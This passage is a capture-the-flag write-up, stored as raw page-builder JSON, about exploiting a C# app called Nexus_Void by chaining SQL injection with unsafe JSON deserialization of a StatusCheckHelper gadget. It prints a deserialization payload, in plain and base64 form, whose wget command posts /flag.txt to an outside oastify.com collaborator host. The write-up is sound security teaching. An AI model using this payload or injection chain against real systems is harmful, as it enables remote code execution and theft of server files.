};\n",{"type":32,"tag":89,"props":4813,"children":4814},{"class":91,"line":1088},[4815,4820,4824,4829,4833,4837],{"type":32,"tag":89,"props":4816,"children":4817},{"style":159},[4818],{"type":37,"value":4819}," p",{"type":32,"tag":89,"props":4821,"children":4822},{"style":124},[4823],{"type":37,"value":167},{"type":32,"tag":89,"props":4825,"children":4826},{"style":159},[4827],{"type":37,"value":4828},"StartInfo",{"type":32,"tag":89,"props":4830,"children":4831},{"style":124},[4832],{"type":37,"value":156},{"type":32,"tag":89,"props":4834,"children":4835},{"style":159},[4836],{"type":37,"value":4580},{"type":32,"tag":89,"props":4838,"children":4839},{"style":124},[4840],{"type":37,"value":1866},{"type":32,"tag":89,"props":4842,"children":4843},{"class":91,"line":1118},[4844,4848,4852,4857],{"type":32,"tag":89,"props":4845,"children":4846},{"style":159},[4847],{"type":37,"value":4819},{"type":32,"tag":89,"props":4849,"children":4850},{"style":124},[4851],{"type":37,"value":167},{"type":32,"tag":89,"props":4853,"children":4854},{"style":118},[4855],{"type":37,"value":4856},"Start",{"type":32,"tag":89,"props":4858,"children":4859},{"style":124},[4860],{"type":37,"value":208},{"type":32,"tag":89,"props":4862,"children":4863},{"class":91,"line":1162},[4864,4869,4873,4877,4881,4886,4890,4895],{"type":32,"tag":89,"props":4865,"children":4866},{"style":159},[4867],{"type":37,"value":4868}," output",{"type":32,"tag":89,"props":4870,"children":4871},{"style":124},[4872],{"type":37,"value":156},{"type":32,"tag":89,"props":4874,"children":4875},{"style":159},[4876],{"type":37,"value":4528},{"type":32,"tag":89,"props":4878,"children":4879},{"style":124},[4880],{"type":37,"value":167},{"type":32,"tag":89,"props":4882,"children":4883},{"style":159},[4884],{"type":37,"value":4885},"StandardOutput",{"type":32,"tag":89,"props":4887,"children":4888},{"style":124},[4889],{"type":37,"value":167},{"type":32,"tag":89,"props":4891,"children":4892},{"style":118},[4893],{"type":37,"value":4894},"ReadToEnd",{"type":32,"tag":89,"props":4896,"children":4897},{"style":124},[4898],{"type":37,"value":208},{"type":32,"tag":89,"props":4900,"children":4901},{"class":91,"line":1230},[4902],{"type":32,"tag":89,"props":4903,"children":4904},{"style":124},[4905],{"type":37,"value":4906}," }\n",{"type":32,"tag":89,"props":4908,"children":4909},{"class":91,"line":1270},[4910,4915,4919,4923],{"type":32,"tag":89,"props":4911,"children":4912},{"style":124},[4913],{"type":37,"value":4914}," [",{"type":32,"tag":89,"props":4916,"children":4917},{"style":106},[4918],{"type":37,"value":292},{"type":32,"tag":89,"props":4920,"children":4921},{"style":295},[4922],{"type":37,"value":167},{"type":32,"tag":89,"props":4924,"children":4925},{"style":124},[4926],{"type":37,"value":302},{"type":32,"tag":89,"props":4928,"children":4929},{"class":91,"line":1279},[4930],{"type":32,"tag":89,"props":4931,"children":4932},{"style":124},[4933],{"type":37,"value":1077},{"type":32,"tag":89,"props":4935,"children":4936},{"class":91,"line":1288},[4937],{"type":32,"tag":89,"props":4938,"children":4939},{"style":124},[4940],{"type":37,"value":1276},{"type":32,"tag":89,"props":4942,"children":4943},{"class":91,"line":1296},[4944],{"type":32,"tag":89,"props":4945,"children":4946},{"emptyLinePlaceholder":275},[4947],{"type":37,"value":278},{"type":32,"tag":89,"props":4949,"children":4950},{"class":91,"line":1354},[4951],{"type":32,"tag":89,"props":4952,"children":4953},{"emptyLinePlaceholder":275},[4954],{"type":37,"value":278},{"type":32,"tag":89,"props":4956,"children":4957},{"class":91,"line":1406},[4958],{"type":32,"tag":89,"props":4959,"children":4960},{"style":124},[4961],{"type":37,"value":1648},{"type":32,"tag":89,"props":4963,"children":4964},{"class":91,"line":1435},[4965],{"type":32,"tag":89,"props":4966,"children":4967},{"style":124},[4968],{"type":37,"value":311},{"type":32,"tag":46,"props":4970,"children":4971},{},[4972,4974,4979],{"type":37,"value":4973},"We can see that it is when setting the value of the ",{"type":32,"tag":85,"props":4975,"children":4977},{"className":4976},[],[4978],{"type":37,"value":3926},{"type":37,"value":4980}," attribute that the system function is called. So, our goal now is to exploit deserialization with an instance of this class where we have set the command with our payload.",{"type":32,"tag":46,"props":4982,"children":4983},{},[4984],{"type":37,"value":4985},"This is what we will see in the next chapter.",{"type":32,"tag":39,"props":4987,"children":4989},{"id":4988},"exploitation",[4990],{"type":37,"value":4991},"Exploitation",{"type":32,"tag":46,"props":4993,"children":4994},{},[4995],{"type":37,"value":4996},"We have SQL injection vulnerabilities on each query, an unsafe deserialization from a database result allowing us to achieve remote code execution (RCE). Therefore, we can exploit this SQLi to our advantage for RCE.",{"type":32,"tag":4998,"props":4999,"children":5001},"h4",{"id":5000},"create-a-serialized-payload",[5002],{"type":37,"value":5003},"Create a serialized payload",{"type":32,"tag":46,"props":5005,"children":5006},{},[5007,5009,5014],{"type":37,"value":5008},"To begin, we need to create a serialized payload that will contain an instance of the ",{"type":32,"tag":85,"props":5010,"children":5012},{"className":5011},[],[5013],{"type":37,"value":4247},{"type":37,"value":5015}," class, which will set a value to the command.",{"type":32,"tag":46,"props":5017,"children":5018},{},[5019],{"type":37,"value":5020},"Our payload will be as follows:",{"type":32,"tag":74,"props":5022,"children":5023},{"lang":3313},[5024],{"type":32,"tag":79,"props":5025,"children":5028},{"code":5026,"language":3313,"meta":7,"className":5027,"style":7},"{\n\"$type\": \"Nexus_Void.Helpers.StatusCheckHelper, Nexus_Void\",\n\"command\": \"wget --header='Content-type: multipart/form-data boundary=FILEUPLOAD' --post-file /flag.txt http://aesz1k6cgyylzco4zrdoyv12ltrqfq3f.oastify.com\"\n}\n","language-json shiki shiki-themes vitesse-dark",[5029],{"type":32,"tag":85,"props":5030,"children":5031},{"__ignoreMap":7},[5032,5039,5078,5111],{"type":32,"tag":89,"props":5033,"children":5034},{"class":91,"line":92},[5035],{"type":32,"tag":89,"props":5036,"children":5037},{"style":124},[5038],{"type":37,"value":136},{"type":32,"tag":89,"props":5040,"children":5041},{"class":91,"line":102},[5042,5047,5052,5056,5061,5065,5070,5074],{"type":32,"tag":89,"props":5043,"children":5045},{"style":5044},"--shiki-default:#B8A96577",[5046],{"type":37,"value":183},{"type":32,"tag":89,"props":5048,"children":5050},{"style":5049},"--shiki-default:#B8A965",[5051],{"type":37,"value":3750},{"type":32,"tag":89,"props":5053,"children":5054},{"style":5044},[5055],{"type":37,"value":183},{"type":32,"tag":89,"props":5057,"children":5058},{"style":124},[5059],{"type":37,"value":5060},":",{"type":32,"tag":89,"props":5062,"children":5063},{"style":180},[5064],{"type":37,"value":3169},{"type":32,"tag":89,"props":5066,"children":5067},{"style":186},[5068],{"type":37,"value":5069},"Nexus_Void.Helpers.StatusCheckHelper, Nexus_Void",{"type":32,"tag":89,"props":5071,"children":5072},{"style":180},[5073],{"type":37,"value":183},{"type":32,"tag":89,"props":5075,"children":5076},{"style":124},[5077],{"type":37,"value":4636},{"type":32,"tag":89,"props":5079,"children":5080},{"class":91,"line":130},[5081,5085,5089,5093,5097,5101,5106],{"type":32,"tag":89,"props":5082,"children":5083},{"style":5044},[5084],{"type":37,"value":183},{"type":32,"tag":89,"props":5086,"children":5087},{"style":5049},[5088],{"type":37,"value":3926},{"type":32,"tag":89,"props":5090,"children":5091},{"style":5044},[5092],{"type":37,"value":183},{"type":32,"tag":89,"props":5094,"children":5095},{"style":124},[5096],{"type":37,"value":5060},{"type":32,"tag":89,"props":5098,"children":5099},{"style":180},[5100],{"type":37,"value":3169},{"type":32,"tag":89,"props":5102,"children":5103},{"style":186},[5104],{"type":37,"value":5105},"wget --header='Content-type: multipart/form-data boundary=FILEUPLOAD' --post-file /flag.txt http://aesz1k6cgyylzco4zrdoyv12ltrqfq3f.oastify.com",{"type":32,"tag":89,"props":5107,"children":5108},{"style":180},[5109],{"type":37,"value":5110},"\"\n",{"type":32,"tag":89,"props":5112,"children":5113},{"class":91,"line":139},[5114],{"type":32,"tag":89,"props":5115,"children":5116},{"style":124},[5117],{"type":37,"value":311},{"type":32,"tag":46,"props":5119,"children":5120},{},[5121],{"type":37,"value":5122},"There is some detail about this payload:",{"type":32,"tag":5124,"props":5125,"children":5128},"img",{"width":5126,"src":5127},950,"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704406996/writeups/nexus-void/payload_detail.webp",[],{"type":32,"tag":46,"props":5130,"children":5131},{},[5132,5134,5139,5141,5146],{"type":37,"value":5133},"The value of ",{"type":32,"tag":85,"props":5135,"children":5137},{"className":5136},[],[5138],{"type":37,"value":3750},{"type":37,"value":5140}," will allow us to target the instance of the class that will be deserialized. Then we set the attribute ",{"type":32,"tag":85,"props":5142,"children":5144},{"className":5143},[],[5145],{"type":37,"value":3926},{"type":37,"value":5147}," of our instance with our command to be executed.",{"type":32,"tag":74,"props":5149,"children":5150},{"lang":3519},[5151],{"type":32,"tag":79,"props":5152,"children":5154},{"code":5153},"ewoiJHR5cGUiOiAiTmV4dXNfVm9pZC5IZWxwZXJzLlN0YXR1c0NoZWNrSGVscGVyLCBOZXh1c19Wb2lkIiwKImNvbW1hbmQiOiAid2dldCAgLS1oZWFkZXI9Q29udGVudC10eXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhIGJvdW5kYXJ5PUZJTEVVUExPQUQgLS1wb3N0LWZpbGUgL2ZsYWcudHh0IFtodHRwOi8vYWVzejFrNmNneXlsemNvNHpyZG95djEybHRycWZxM2Yub2FzdGlmeS5jb21dKGh0dHA6Ly9hZXN6MWs2Y2d5eWx6Y280enJkb3l2MTJsdHJxZnEzZi5vYXN0aWZ5LmNvbS8pIgp9Cg==\n",[5155],{"type":32,"tag":85,"props":5156,"children":5157},{"__ignoreMap":7},[5158],{"type":37,"value":5153},{"type":32,"tag":4998,"props":5160,"children":5162},{"id":5161},"update-the-database",[5163],{"type":37,"value":5164},"Update the database",{"type":32,"tag":46,"props":5166,"children":5167},{},[5168],{"type":37,"value":5169},"The deserialization is triggered when the Wishlist is retrieved. The wishlist is specific to our account, so we need to start by adding a product to our wishlist, the first one for example.",{"type":32,"tag":46,"props":5171,"children":5172},{},[5173],{"type":37,"value":5174},"After adding the product with ID 1 to our wishlist, we need to update the database to change the value of the data for our wishlist.",{"type":32,"tag":52,"props":5176,"children":5178},{"imgSrc":5177},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499801/writeups/nexus-void/favorites_frontend.webp",[],{"type":32,"tag":46,"props":5180,"children":5181},{},[5182],{"type":37,"value":5183},"The associated query is as follows:",{"type":32,"tag":52,"props":5185,"children":5187},{"imgSrc":5186},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499797/writeups/nexus-void/request_add_elmt_wishlist.webp",[],{"type":32,"tag":46,"props":5189,"children":5190},{},[5191],{"type":37,"value":5192},"If we go to the wishlist page, we can see the product added to the list.",{"type":32,"tag":52,"props":5194,"children":5196},{"imgSrc":5195},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499793/writeups/nexus-void/wish_list_frontend.webp",[],{"type":32,"tag":46,"props":5198,"children":5199},{},[5200,5202,5207],{"type":37,"value":5201},"It is this product that we will pollute. If we remember the deserialization part, it executes it from the ",{"type":32,"tag":85,"props":5203,"children":5205},{"className":5204},[],[5206],{"type":37,"value":826},{"type":37,"value":5208}," value of the wishlist result.",{"type":32,"tag":74,"props":5210,"children":5211},{"lang":76},[5212],{"type":32,"tag":79,"props":5213,"children":5215},{"code":5214,"language":76,"meta":7,"className":82,"style":7},"List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n",[5216],{"type":32,"tag":85,"props":5217,"children":5218},{"__ignoreMap":7},[5219],{"type":32,"tag":89,"props":5220,"children":5221},{"class":91,"line":92},[5222,5226,5230,5234,5238,5242,5246,5250,5254,5258,5262,5266,5270,5274],{"type":32,"tag":89,"props":5223,"children":5224},{"style":112},[5225],{"type":37,"value":2287},{"type":32,"tag":89,"props":5227,"children":5228},{"style":124},[5229],{"type":37,"value":853},{"type":32,"tag":89,"props":5231,"children":5232},{"style":112},[5233],{"type":37,"value":858},{"type":32,"tag":89,"props":5235,"children":5236},{"style":124},[5237],{"type":37,"value":863},{"type":32,"tag":89,"props":5239,"children":5240},{"style":118},[5241],{"type":37,"value":868},{"type":32,"tag":89,"props":5243,"children":5244},{"style":124},[5245],{"type":37,"value":156},{"type":32,"tag":89,"props":5247,"children":5248},{"style":159},[5249],{"type":37,"value":877},{"type":32,"tag":89,"props":5251,"children":5252},{"style":124},[5253],{"type":37,"value":167},{"type":32,"tag":89,"props":5255,"children":5256},{"style":118},[5257],{"type":37,"value":886},{"type":32,"tag":89,"props":5259,"children":5260},{"style":124},[5261],{"type":37,"value":357},{"type":32,"tag":89,"props":5263,"children":5264},{"style":159},[5265],{"type":37,"value":777},{"type":32,"tag":89,"props":5267,"children":5268},{"style":124},[5269],{"type":37,"value":167},{"type":32,"tag":89,"props":5271,"children":5272},{"style":159},[5273],{"type":37,"value":826},{"type":32,"tag":89,"props":5275,"children":5276},{"style":124},[5277],{"type":37,"value":907},{"type":32,"tag":46,"props":5279,"children":5280},{},[5281,5283,5288],{"type":37,"value":5282},"So we need to update the ",{"type":32,"tag":85,"props":5284,"children":5286},{"className":5285},[],[5287],{"type":37,"value":826},{"type":37,"value":5289}," value of our wishlist to contain our serialized payload.",{"type":32,"tag":46,"props":5291,"children":5292},{},[5293],{"type":37,"value":5294},"We can therefore use our previous request.",{"type":32,"tag":46,"props":5296,"children":5297},{},[5298],{"type":32,"tag":5299,"props":5300,"children":5301},"em",{},[5302],{"type":37,"value":5303},"Note: It is possible to chain SQL queries in our injection.",{"type":32,"tag":52,"props":5305,"children":5307},{"imgSrc":5306},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499778/writeups/nexus-void/request_exploit_detail.webp",[],{"type":32,"tag":46,"props":5309,"children":5310},{},[5311],{"type":37,"value":5312},"After that, we can see in the docker logs that we have successfully executed our update query.",{"type":32,"tag":52,"props":5314,"children":5316},{"imgSrc":5315},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499783/writeups/nexus-void/docker_log.webp",[],{"type":32,"tag":46,"props":5318,"children":5319},{},[5320],{"type":37,"value":5321},"We just need to refresh the page that lists our wishlist, which will execute our order. We can then see that our collaborator has received the flag.",{"type":32,"tag":52,"props":5323,"children":5325},{"imgSrc":5324},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499788/writeups/nexus-void/flag_collab.webp",[],{"type":32,"tag":5327,"props":5328,"children":5329},"style",{},[5330],{"type":37,"value":5331},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":102,"depth":92,"links":5333},[5334,5335,5336,5337],{"id":41,"depth":102,"text":44},{"id":59,"depth":102,"text":62},{"id":1698,"depth":102,"text":1701},{"id":4988,"depth":102,"text":4991},"markdown","content:writeups:nexus-void.md","content","writeups/nexus-void.md","writeups/nexus-void","md",1749027224529]